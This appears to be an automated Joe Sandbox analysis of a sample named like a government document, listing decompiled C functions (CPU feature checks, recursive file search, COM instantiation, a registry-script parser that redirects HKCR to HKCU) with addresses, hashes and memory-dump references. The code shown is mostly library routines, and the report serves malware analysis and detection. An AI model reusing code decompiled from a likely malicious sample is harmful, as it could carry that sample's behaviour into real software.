						_t63 = _t62 | 0x00000004;
						 *0x292724 = 2;
						 *0x169010 = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0x169010; // 0x6f
								_t67 = _t66 | 0x00000008;
								 *0x292724 = 3;
								 *0x169010 = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0x292724 = 5;
									 *0x169010 = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0x169010 =  *0x169010 | 0x00000040;
										 *0x292724 = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t99 =  *0x292728; // 0x2
					_t96 = _t99 | 0x00000001;
					 *0x292728 = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}

0x00154775
0x00154778
0x00154782
0x00154793
0x00154945
0x00154948
0x00154948
0x00154799
0x0015479f
0x001547a4
0x001547a8
0x001547ac
0x001547ae
0x001547b0
0x001547b3
0x001547b8
0x001547c1
0x001547d2
0x001547dd
0x001547e3
0x001547e4
0x001547ea
0x001547ed
0x001547f7
0x001547fa
0x001547fd
0x00154800
0x00154845
0x00154845
0x0015484b
0x0015484b
0x00154850
0x00154851
0x00154857
0x00154889
0x00154859
0x0015485b
0x0015485c
0x00154862
0x00154865
0x00154867
0x0015486a
0x0015486d
0x00154870
0x00154873
0x0015487c
0x00154881
0x00154881
0x0015487c
0x0015488c
0x00154891
0x00154894
0x0015489e
0x001548a9
0x001548af
0x001548b2
0x001548bc
0x001548c7
0x001548d3
0x001548d6
0x001548d9
0x001548e4
0x001548e9
0x001548eb
0x001548f0
0x001548f3
0x001548fd
0x00154905
0x0015490a
0x00154914
0x00154922
0x00154935
0x0015493c
0x0015493c
0x00154922
0x00154905
0x001548e9
0x001548c7
0x00000000
0x00154944
0x00154805
0x0015480f
0x00154834
0x0015483a
0x0015483d
0x00000000
0x00000000
0x00000000
0x00000000

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0015478B

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 1a6477c8f2ee4bf6800d6d58098421d802e8d79b15b650ffbcf28955caf3395a
Instruction ID: 30ccf5a7ce4e2646fa42eaf6a9c5f0e3d24840e6f71dd3c1d3b6b9f084c6a526
Opcode Fuzzy Hash: 1a6477c8f2ee4bf6800d6d58098421d802e8d79b15b650ffbcf28955caf3395a
Instruction Fuzzy Hash: E65183B1901205DFDB19CF94EC957AEBBF4FB48359F14842AD861EB350D3B49988CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0015A22B Relevance: 1.6, APIs: 1, Instructions: 140
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0015A22B(void* __ecx, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				union _FINDEX_INFO_LEVELS _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				signed int _v48;
				struct _WIN32_FIND_DATAW _v604;
				char _v605;
				intOrPtr* _v612;
				union _FINDEX_INFO_LEVELS _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				signed int _v628;
				union _FINDEX_INFO_LEVELS _v632;
				union _FINDEX_INFO_LEVELS _v636;
				signed int _v640;
				signed int _v644;
				union _FINDEX_INFO_LEVELS _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				signed int _v664;
				union _FINDEX_INFO_LEVELS _v668;
				union _FINDEX_INFO_LEVELS _v672;
				void* __ebx;
				void* __edi;
				intOrPtr _t68;
				signed int _t73;
				signed int _t75;
				char _t77;
				signed char _t78;
				signed int _t84;
				signed int _t94;
				signed int _t97;
				union _FINDEX_INFO_LEVELS _t98;
				union _FINDEX_INFO_LEVELS _t100;
				intOrPtr* _t106;
				signed int _t109;
				intOrPtr _t116;
				signed int _t118;
				signed int _t121;
				signed int _t123;
				void* _t126;
				union _FINDEX_INFO_LEVELS _t127;
				void* _t128;
				intOrPtr* _t130;
				intOrPtr* _t133;
				signed int _t135;
				intOrPtr* _t138;
				signed int _t143;
				signed int _t149;
				void* _t155;
				signed int _t158;
				intOrPtr _t160;
				void* _t161;
				void* _t165;
				void* _t166;
				signed int _t167;
				signed int _t170;
				void* _t171;
				signed int _t172;
				void* _t173;
				void* _t174;

				_push(__ecx);
				_t133 = _a4;
				_t2 = _t133 + 1; // 0x1
				_t155 = _t2;
				do {
					_t68 =  *_t133;
					_t133 = _t133 + 1;
				} while (_t68 != 0);
				_t158 = _a12;
				_t135 = _t133 - _t155 + 1;
				_v8 = _t135;
				if(_t135 <=  !_t158) {
					_push(__esi);
					_t5 = _t158 + 1; // 0x1
					_t126 = _t5 + _t135;
					_t165 = E00159E27(_t126, 1);
					__eflags = _t158;
					if(_t158 == 0) {
						L7:
						_push(_v8);
						_t126 = _t126 - _t158;
						_t73 = E0015CB84(_t165 + _t158, _t126, _a4);
						_t172 = _t171 + 0x10;
						__eflags = _t73;
						if(_t73 != 0) {
							goto L12;
						} else {
							_t130 = _a16;
							_t118 = E0015A626(_t130);
							_v8 = _t118;
							__eflags = _t118;
							if(_t118 == 0) {
								 *( *(_t130 + 4)) = _t165;
								_t167 = 0;
								_t14 = _t130 + 4;
								 *_t14 =  *(_t130 + 4) + 4;
								__eflags =  *_t14;
							} else {
								E00158B82(_t165);
								_t167 = _v8;
							}
							E00158B82(0);
							_t121 = _t167;
							goto L4;
						}
					} else {
						_push(_t158);
						_t123 = E0015CB84(_t165, _t126, _a8);
						_t172 = _t171 + 0x10;
						__eflags = _t123;
						if(_t123 != 0) {
							L12:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E0015749C();
							asm("int3");
							_t170 = _t172;
							_t173 = _t172 - 0x298;
							_t75 =  *0x169008; // 0x26a91022
							_v48 = _t75 ^ _t170;
							_t138 = _v32;
							_t156 = _v28;
							_push(_t126);
							_push(0);
							_t160 = _v36;
							_v648 = _t156;
							__eflags = _t138 - _t160;
							if(_t138 != _t160) {
								while(1) {
									_t116 =  *_t138;
									__eflags = _t116 - 0x2f;
									if(_t116 == 0x2f) {
										break;
									}
									__eflags = _t116 - 0x5c;
									if(_t116 != 0x5c) {
										__eflags = _t116 - 0x3a;
										if(_t116 != 0x3a) {
											_t138 = E0015D0C0(_t160, _t138);
											__eflags = _t138 - _t160;
											if(_t138 != _t160) {
												continue;
											}
										}
									}
									break;
								}
								_t156 = _v612;
							}
							_t77 =  *_t138;
							_v605 = _t77;
							__eflags = _t77 - 0x3a;
							if(_t77 != 0x3a) {
								L23:
								_t127 = 0;
								__eflags = _t77 - 0x2f;
								if(__eflags == 0) {
									L26:
									_t78 = 1;
								} else {
									__eflags = _t77 - 0x5c;
									if(__eflags == 0) {
										goto L26;
									} else {
										__eflags = _t77 - 0x3a;
										_t78 = 0;
										if(__eflags == 0) {
											goto L26;
										}
									}
								}
								_v672 = _t127;
								_v668 = _t127;
								_push(_t165);
								asm("sbb eax, eax");
								_v664 = _t127;
								_v660 = _t127;
								_v640 =  ~(_t78 & 0x000000ff) & _t138 - _t160 + 0x00000001;
								_v656 = _t127;
								_v652 = _t127;
								_t84 = E0015A01F(_t138 - _t160 + 1, _t160,  &_v672, E0015A533(_t156, __eflags));
								_t174 = _t173 + 0xc;
								asm("sbb eax, eax");
								_t166 = FindFirstFileExW( !( ~_t84) & _v664, _t127,  &_v604, _t127, _t127, _t127);
								__eflags = _t166 - 0xffffffff;
								if(_t166 != 0xffffffff) {
									_t143 =  *((intOrPtr*)(_v612 + 4)) -  *_v612;
									__eflags = _t143;
									_t144 = _t143 >> 2;
									_v644 = _t143 >> 2;
									do {
										_v636 = _t127;
										_v632 = _t127;
										_v628 = _t127;
										_v624 = _t127;
										_v620 = _t127;
										_v616 = _t127;
										_t94 = E00159F50( &(_v604.cFileName),  &_v636,  &_v605, E0015A533(_t156, __eflags));
										_t174 = _t174 + 0x10;
										asm("sbb eax, eax");
										_t97 =  !( ~_t94) & _v628;
										__eflags =  *_t97 - 0x2e;
										if( *_t97 != 0x2e) {
											L34:
											_push(_v612);
											_t98 = E0015A22B(_t144, _t166, _t97, _t160, _v640);
											_t174 = _t174 + 0x10;
											_v648 = _t98;
											__eflags = _t98;
											if(_t98 != 0) {
												__eflags = _v616 - _t127;
												if(_v616 != _t127) {
													E00158B82(_v628);
													_t98 = _v648;
												}
												_t127 = _t98;
											} else {
												goto L35;
											}
										} else {
											_t144 =  *((intOrPtr*)(_t97 + 1));
											__eflags = _t144;
											if(_t144 == 0) {
												goto L35;
											} else {
												__eflags = _t144 - 0x2e;
												if(_t144 != 0x2e) {
													goto L34;
												} else {
													__eflags =  *((intOrPtr*)(_t97 + 2)) - _t127;
													if( *((intOrPtr*)(_t97 + 2)) == _t127) {
														goto L35;
													} else {
														goto L34;
													}
												}
											}
										}
										L43:
										FindClose(_t166);
										goto L44;
										L35:
										__eflags = _v616 - _t127;
										if(_v616 != _t127) {
											E00158B82(_v628);
											_pop(_t144);
										}
										__eflags = FindNextFileW(_t166,  &_v604);
									} while (__eflags != 0);
									_t106 = _v612;
									_t149 = _v644;
									_t156 =  *_t106;
									_t109 =  *((intOrPtr*)(_t106 + 4)) -  *_t106 >> 2;
									__eflags = _t149 - _t109;
									if(_t149 != _t109) {
										E0015CB90(_t156, _t156 + _t149 * 4, _t109 - _t149, 4, E00159E84);
									}
									goto L43;
								} else {
									_push(_v612);
									_t127 = E0015A22B( &_v604, _t166, _t160, _t127, _t127);
								}
								L44:
								__eflags = _v652;
								_pop(_t165);
								if(_v652 != 0) {
									E00158B82(_v664);
								}
								_t100 = _t127;
							} else {
								__eflags = _t138 - _t160 + 1;
								if(_t138 == _t160 + 1) {
									_t77 = _v605;
									goto L23;
								} else {
									_push(_t156);
									_t100 = E0015A22B(_t138, _t165, _t160, 0, 0);
								}
							}
							_pop(_t161);
							__eflags = _v12 ^ _t170;
							_pop(_t128);
							return E0015403C(_t100, _t128, _v12 ^ _t170, _t156, _t161, _t165);
						} else {
							goto L7;
						}
					}
				} else {
					_t121 = 0xc;
					L4:
					return _t121;
				}
			}

0x0015a230
0x0015a231
0x0015a234
0x0015a234
0x0015a237
0x0015a237
0x0015a239
0x0015a23a
0x0015a23f
0x0015a246
0x0015a249
0x0015a24e
0x0015a257
0x0015a258
0x0015a25b
0x0015a265
0x0015a269
0x0015a26b
0x0015a27f
0x0015a27f
0x0015a282
0x0015a28c
0x0015a291
0x0015a294
0x0015a296
0x00000000
0x0015a298
0x0015a298
0x0015a29d
0x0015a2a4
0x0015a2a7
0x0015a2a9
0x0015a2ba
0x0015a2bc
0x0015a2be
0x0015a2be
0x0015a2be
0x0015a2ab
0x0015a2ac
0x0015a2b1
0x0015a2b4
0x0015a2c3
0x0015a2c9
0x00000000
0x0015a2cc
0x0015a26d
0x0015a26d
0x0015a273
0x0015a278
0x0015a27b
0x0015a27d
0x0015a2cf
0x0015a2d1
0x0015a2d2
0x0015a2d3
0x0015a2d4
0x0015a2d5
0x0015a2d6
0x0015a2db
0x0015a2df
0x0015a2e1
0x0015a2e7
0x0015a2ee
0x0015a2f1
0x0015a2f4
0x0015a2f7
0x0015a2f8
0x0015a2f9
0x0015a2fc
0x0015a302
0x0015a304
0x0015a306
0x0015a306
0x0015a308
0x0015a30a
0x00000000
0x00000000
0x0015a30c
0x0015a30e
0x0015a310
0x0015a312
0x0015a31d
0x0015a31f
0x0015a321
0x00000000
0x00000000
0x0015a321
0x0015a312
0x00000000
0x0015a30e
0x0015a323
0x0015a323
0x0015a329
0x0015a32b
0x0015a331
0x0015a333
0x0015a355
0x0015a355
0x0015a357
0x0015a359
0x0015a365
0x0015a365
0x0015a35b
0x0015a35b
0x0015a35d
0x00000000
0x0015a35f
0x0015a35f
0x0015a361
0x0015a363
0x00000000
0x00000000
0x0015a363
0x0015a35d
0x0015a36d
0x0015a375
0x0015a37b
0x0015a37c
0x0015a37e
0x0015a386
0x0015a38c
0x0015a392
0x0015a398
0x0015a3ac
0x0015a3b1
0x0015a3bc
0x0015a3d2
0x0015a3d4
0x0015a3d7
0x0015a3fa
0x0015a3fa
0x0015a3fc
0x0015a3ff
0x0015a405
0x0015a405
0x0015a40b
0x0015a411
0x0015a417
0x0015a41d
0x0015a423
0x0015a444
0x0015a449
0x0015a44e
0x0015a452
0x0015a458
0x0015a45b
0x0015a46e
0x0015a46e
0x0015a47c
0x0015a481
0x0015a484
0x0015a48a
0x0015a48c
0x0015a4ea
0x0015a4f0
0x0015a4f8
0x0015a4fd
0x0015a503
0x0015a504
0x00000000
0x00000000
0x00000000
0x0015a45d
0x0015a45d
0x0015a460
0x0015a462
0x00000000
0x0015a464
0x0015a464
0x0015a467
0x00000000
0x0015a469
0x0015a469
0x0015a46c
0x00000000
0x00000000
0x00000000
0x00000000
0x0015a46c
0x0015a467
0x0015a462
0x0015a506
0x0015a507
0x00000000
0x0015a48e
0x0015a48e
0x0015a494
0x0015a49c
0x0015a4a1
0x0015a4a1
0x0015a4b0
0x0015a4b0
0x0015a4b8
0x0015a4be
0x0015a4c4
0x0015a4cb
0x0015a4ce
0x0015a4d0
0x0015a4e0
0x0015a4e5
0x00000000
0x0015a3d9
0x0015a3d9
0x0015a3ea
0x0015a3ea
0x0015a50d
0x0015a50d
0x0015a514
0x0015a515
0x0015a51d
0x0015a522
0x0015a523
0x0015a335
0x0015a338
0x0015a33a
0x0015a34f
0x00000000
0x0015a33c
0x0015a33c
0x0015a342
0x0015a347
0x0015a33a
0x0015a528
0x0015a529
0x0015a52b
0x0015a532
0x00000000
0x00000000
0x00000000
0x0015a27d
0x0015a250
0x0015a252
0x0015a253
0x0015a255
0x0015a255

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b46f1840bcb590f617a010ad8139ec99772118c6ab07a54a53abf287b20936a
Instruction ID: 5fac1ee5d70babc128e05b10690143c7c69ccc41d37174360e2e4d1afb369af8
Opcode Fuzzy Hash: 9b46f1840bcb590f617a010ad8139ec99772118c6ab07a54a53abf287b20936a
Instruction Fuzzy Hash: D241B471844218EEDF20DF69CC89AEABBB8EF55305F5442D9E81DD7201DB319E888F10

Uniqueness

Uniqueness Score: -1.00%

Function 001514A2 Relevance: 1.5, APIs: 1, Instructions: 35
comCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E001514A2(void* __ecx, intOrPtr* _a4) {
				void* _t4;
				intOrPtr* _t8;
				intOrPtr* _t11;
				intOrPtr* _t14;
				void* _t17;

				_t8 = _a4;
				if(_t8 != 0) {
					_t17 = 0;
					_t14 = __ecx + 0x28;
					if( *_t14 != 0) {
						L4:
						 *_t8 =  *_t14;
						_t11 =  *_t14;
						 *((intOrPtr*)( *_t11 + 4))(_t11);
						L5:
						return _t17;
					}
					__imp__CoCreateInstance(0x1612d0, 0, 1, 0x166250, _t14);
					_t17 = _t4;
					if(_t17 < 0) {
						goto L5;
					}
					goto L4;
				}
				return 0x80004003;
			}

0x001514a6
0x001514ab
0x001514b6
0x001514b8
0x001514bd
0x001514d9
0x001514db
0x001514dd
0x001514e2
0x001514e5
0x00000000
0x001514e8
0x001514cd
0x001514d3
0x001514d7
0x00000000
0x00000000
0x00000000
0x001514d7
0x00000000

APIs

CoCreateInstance.OLE32(001612D0,00000000,00000001,00166250,?), ref: 001514CD

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 2dd4ace8e0d20d4d615d82438b9a0ff1f15b6ed2e92d593513e7e4aba4ec2655
Instruction ID: 87fe596ca6fcabccf542fa713178813753d0e8ba77e14b3cd45e8999555e3270
Opcode Fuzzy Hash: 2dd4ace8e0d20d4d615d82438b9a0ff1f15b6ed2e92d593513e7e4aba4ec2655
Instruction Fuzzy Hash: F1F08276204221FBC7218F46DC94E86FB6CEF95B617104229FE09EF240C7709C54C6E5

Uniqueness

Uniqueness Score: -1.00%

Function 0015B2B8 Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0015B2B8() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x292dc0 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x0015b2b8
0x0015b2c0
0x0015b2c8

APIs

GetProcessHeap.KERNEL32 ref: 0015B2B8

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: f3e376d667f9f7e432872c3ff0a7b16e9b1b109545c2120edc99b0d444a728a5
Instruction ID: fef882c98899ae874d2c09fafd46329d58e16c5f7b5b2657be2c23209a305842
Opcode Fuzzy Hash: f3e376d667f9f7e432872c3ff0a7b16e9b1b109545c2120edc99b0d444a728a5
Instruction Fuzzy Hash: EFA01130202202EB83008F30BF082083BA8BA0028230800AAE008C0020EB2080808A20

Uniqueness

Uniqueness Score: -1.00%

Function 00159DF6 Relevance: .0, Instructions: 22
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00159DF6(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E00159841(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}

0x00159e03
0x00159e05
0x00159e08
0x00159e0b
0x00159e0e
0x00159e1f
0x00159e21
0x00159e10
0x00159e14
0x00159e1d
0x00000000
0x00000000
0x00159e1d
0x00159e26

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed9c1925cec1054f47211cdcd88e88786feddc4eef384b275f41e22a3a111c21
Instruction ID: 1a9f1e8cd6c3659881ed39914e29e4d611df54dbfd5eeb32f0973881e2cdcacd
Opcode Fuzzy Hash: ed9c1925cec1054f47211cdcd88e88786feddc4eef384b275f41e22a3a111c21
Instruction Fuzzy Hash: 23E08C72911228EBCB14DB88C905D8AF3ECEB45B41B11049AF911D7200C370DE04C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 001529E8 Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 208
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E001529E8(CHAR* __ebx, CHAR** __ecx, void* __edi, void* __esi, void* __eflags) {
				CHAR** _t42;
				void* _t45;
				CHAR* _t47;
				CHAR* _t48;
				CHAR* _t53;
				CHAR* _t61;
				CHAR* _t62;
				CHAR* _t63;
				CHAR* _t64;
				char _t66;
				CHAR* _t67;
				CHAR* _t68;
				CHAR* _t69;
				CHAR* _t73;
				CHAR* _t74;
				CHAR* _t75;
				CHAR* _t76;
				CHAR* _t77;
				CHAR* _t78;
				CHAR* _t79;
				CHAR* _t84;
				void* _t89;
				CHAR* _t92;
				char _t98;
				CHAR** _t101;
				CHAR* _t103;
				void* _t104;
				void* _t105;

				_t80 = __ebx;
				_push(0x40);
				E00160216(0x1608c4, __ebx, __edi, __esi);
				_t101 = __ecx;
				_t103 =  *(_t104 + 8);
				_t42 =  *(_t104 + 0xc);
				 *(_t104 - 0x4c) = _t42;
				if(_t103 != 0 && _t42 != 0) {
					_t80 = 0;
					 *_t42 = 0;
					_t45 = E001574D0(_t103);
					 *((intOrPtr*)(_t104 - 0x44)) = 0;
					_t47 =  <  ? 0x3e8 : _t45 + _t45;
					 *(_t104 - 0x40) = _t47;
					__imp__CoTaskMemAlloc(_t47);
					 *(_t104 - 0x3c) = _t47;
					if(_t47 != 0) {
						 *_t47 = 0;
					}
					 *(_t104 - 4) = _t80;
					if(_t47 != 0) {
						 *_t101 = _t103;
						_t48 = _t80;
						_t84 = _t80;
						_t98 =  *0x292df8; // 0x0
						 *((char*)(_t104 - 0x33)) = _t98;
						 *(_t104 - 0x38) = _t48;
						 *(_t104 - 0x32) = _t80;
						 *(_t104 - 0x31) = _t84;
						__eflags =  *_t103 - _t48;
						if( *_t103 == _t48) {
							L45:
							 *(_t104 - 0x3c) = _t80;
							 *( *(_t104 - 0x4c)) =  *(_t104 - 0x3c);
						} else {
							while(1) {
								 *(_t104 - 0x48) = _t48;
								__eflags = _t98 - 1;
								if(_t98 != 1) {
									goto L29;
								}
								__eflags = _t48;
								if(_t48 != 0) {
									L14:
									_t64 =  *_t101;
									__eflags =  *_t64 - 0x27;
									if( *_t64 != 0x27) {
										__eflags = _t84;
										if(_t84 != 0) {
											goto L29;
										} else {
											goto L22;
										}
									} else {
										__eflags = _t84;
										if(_t84 != 0) {
											_t69 = CharNextA(_t64);
											__eflags =  *_t69 - 0x27;
											if( *_t69 == 0x27) {
												_t103 = CharNextA( *_t101);
												 *_t101 = _t103;
												_t73 = E001518A6(_t104 - 0x44, _t103, CharNextA(_t103) - _t103);
												__eflags = _t73;
												if(_t73 == 0) {
													goto L5;
												} else {
													goto L29;
												}
											} else {
												 *(_t104 - 0x31) = _t80;
												L22:
												_t66 =  *( *_t101);
												__eflags = _t66 - 0x7b;
												if(_t66 != 0x7b) {
													_t92 =  *(_t104 - 0x48);
													 *(_t104 - 0x38) = _t92;
													__eflags = _t66 - 0x7d;
													if(_t66 != 0x7d) {
														goto L29;
													} else {
														_t67 = _t92 - 1;
														 *(_t104 - 0x38) = _t67;
														__eflags = _t67;
														if(_t67 != 0) {
															goto L29;
														} else {
															__eflags =  *(_t104 - 0x32) - 1;
															if(__eflags != 0) {
																goto L29;
															} else {
																_push(L"\r\n\t}\r\n}\r\n");
																_t68 = E00151928(_t80, _t104 - 0x44, _t101, _t103, __eflags);
																__eflags = _t68;
																if(_t68 == 0) {
																	goto L5;
																} else {
																	 *(_t104 - 0x32) = _t80;
																	goto L29;
																}
															}
														}
													}
												} else {
													 *(_t104 - 0x38) =  &(( *(_t104 - 0x38))[1]);
													goto L29;
												}
											}
										} else {
											 *(_t104 - 0x31) = 1;
											goto L29;
										}
									}
								} else {
									_t74 = E0015772C(_t103, "HKCR");
									__eflags = _t74;
									if(_t74 == 0) {
										L13:
										_t84 =  *(_t104 - 0x31);
										goto L14;
									} else {
										__eflags = _t74 -  *_t101;
										if(__eflags != 0) {
											goto L13;
										} else {
											_t75 = CharNextA( *_t101);
											 *_t101 = _t75;
											_t76 = CharNextA(_t75);
											 *_t101 = _t76;
											_t77 = CharNextA(_t76);
											 *_t101 = _t77;
											_t78 = CharNextA(_t77);
											_push(L"HKCU\r\n{\tSoftware\r\n\t{\r\n\t\tClasses");
											 *_t101 = _t78;
											_t79 = E00151928(_t80, _t104 - 0x44, _t101, _t103, __eflags);
											__eflags = _t79;
											if(_t79 == 0) {
												goto L5;
											} else {
												 *(_t104 - 0x32) = 1;
												goto L13;
											}
										}
									}
								}
								goto L46;
								L29:
								_t103 =  *_t101;
								_push(_t103);
								__eflags =  *_t103 - 0x25;
								if( *_t103 != 0x25) {
									L32:
									_t53 = E001518A6(_t104 - 0x44, _t103, CharNextA() - _t103);
									__eflags = _t53;
									if(_t53 == 0) {
										goto L5;
									} else {
										goto L33;
									}
								} else {
									_t103 = CharNextA();
									 *_t101 = _t103;
									__eflags =  *_t103 - 0x25;
									if( *_t103 != 0x25) {
										_t103 = E001522D6(_t103, 0x25);
										__eflags = _t103;
										if(_t103 == 0) {
											L44:
											_t80 = 0x80020009;
										} else {
											_t89 = _t103 -  *_t101;
											__eflags = _t89 - 0x1f;
											if(_t89 > 0x1f) {
												_t80 = 0x80004005;
											} else {
												E00151285(E0015770F(_t104 - 0x30, 0x20,  *_t101, _t89));
												_t105 = _t105 + 0x14;
												_t61 = E00152199(_t101[1], _t104 - 0x30);
												__eflags = _t61;
												if(__eflags == 0) {
													goto L44;
												} else {
													_push(_t61);
													_t62 = E00151928(_t80, _t104 - 0x44, _t101, _t103, __eflags);
													__eflags = _t62;
													if(_t62 == 0) {
														goto L5;
													} else {
														_t63 =  *_t101;
														while(1) {
															__eflags = _t63 - _t103;
															if(_t63 == _t103) {
																break;
															}
															_t63 = CharNextA(_t63);
															 *_t101 = _t63;
														}
														L33:
														_t103 = CharNextA( *_t101);
														 *_t101 = _t103;
														__eflags =  *_t103;
														if( *_t103 == 0) {
															goto L45;
														} else {
															_t48 =  *(_t104 - 0x38);
															_t84 =  *(_t104 - 0x31);
															_t98 =  *((intOrPtr*)(_t104 - 0x33));
															continue;
														}
													}
												}
											}
										}
									} else {
										_push(_t103);
										goto L32;
									}
								}
								goto L46;
							}
						}
					} else {
						L5:
						_t80 = 0x8007000e;
					}
					L46:
					__imp__CoTaskMemFree( *(_t104 - 0x3c));
				}
				return E001601C5(_t80, _t101, _t103);
			}

0x001529e8
0x001529e8
0x001529ef
0x001529f4
0x001529f6
0x001529f9
0x001529fc
0x00152a01
0x00152a0f
0x00152a12
0x00152a14
0x00152a1b
0x00152a27
0x00152a2b
0x00152a2e
0x00152a34
0x00152a39
0x00152a3b
0x00152a3b
0x00152a3d
0x00152a42
0x00152a4e
0x00152a50
0x00152a52
0x00152a54
0x00152a5a
0x00152a5d
0x00152a60
0x00152a63
0x00152a66
0x00152a68
0x00152c2b
0x00152c31
0x00152c34
0x00000000
